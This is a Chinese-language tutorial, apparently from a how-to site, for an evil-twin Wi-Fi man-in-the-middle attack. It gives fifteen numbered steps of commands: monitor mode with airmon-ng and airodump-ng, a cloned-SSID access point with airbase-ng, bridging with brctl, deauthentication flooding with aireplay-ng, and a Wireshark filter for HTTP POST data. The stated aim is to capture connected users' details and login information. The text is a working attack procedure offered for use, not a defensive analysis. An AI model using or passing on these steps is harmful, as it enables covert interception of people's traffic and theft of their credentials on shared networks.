抓取wifi数据包和中间人攻击
通过伪造相同名称的wifi接入点,配合发送ARP数据包,攻击连入伪造wifi的用户。一个与原有wifi相同名称的伪造接入点一旦建立,会导致用户从原有链接中断开,并连入攻击者所建立的伪造接入点中,因此所有的通信通道都会流经自己的系统,届时我们通常会用注入的方式拿到用户所有的细节/授信状态/信息等。
操作方法
- 01
开BT5的终端,然后输入”iwconfig” 检查无线网卡 "iwconfig"类似 linux kali中的“ifconfig”
- 02
输入“airmon-ng start wlan0”开启无线网卡。 这个命令可以无线网卡处于监听状态 *注 wlan0为无线网卡的名称 开启后“wlan0"变为”mon0“ kali 变为wlan0mon
- 03
启动监听模式后,输入“airodump-ng mon0”开始抓包;
- 04
设置airodump-ng中显示的频道ID *ch为频道id 输入命令为: iwconfig mon0 channel 频道ID iwconfig wlan0 channel 频道ID
- 05
现在开始建立你的伪造路由器,命令如下: airbase-ng -e "SSiD" 网卡名称 。 *airbase-ng 是可以针对AP(接入点)自身的客户端进行攻击; *“-e + SSID”指定伪造AP的SSID
- 06
现在是时候去“桥接”所有的网络了,命令如下 “brctl addbr mitm” “brctl addif mitm eth0” “brctl addif mitm at0” ***** Brctl 用来在两个网卡之间建立桥接网络。 Addbr 用来添加网桥的对象,用<name>来指定网桥的名称。 Addif 给已经使用addbr创建的网桥中添加一个网卡,后边的参数使用你要添加的网卡名称即可。
- 07
创建一个新的网卡配置,命令如下: ifconfig eth0 0.0.0.0 up ifconfig at0 0.0.0.0 up
- 08
启动我们用来做中间人攻击的网桥。 命令如下: ifconfig mitm up
- 09
使用下面的命令发送认证包到路由器: aireplay-ng - - deauth 0 - a MAC地址 mon0 *aireplay-ng 用来注入帧数据 * -a 指定被攻击者的BSSID。
- 10
开始给被攻击者分配IP,命令如下: dhclient3 mitm& 或者 dhclient3 mitm & * 使用类似DHCP的协议方式分配IP
- 11
你可以看看是不是有客户端已经连接上了,有的话会显示在第五步的那个命令终端里面。
- 12
开wireshark,命令:“wireshark&” 说明:wireshark是个网络协议抓包分析器。
- 13
选择网卡,点开始(start)
- 14
输入 “http contains POST”过滤一下,然后你就可以看到所有抓下来的数据包。
- 15
抓取wifi数据包和中间人攻击的效果图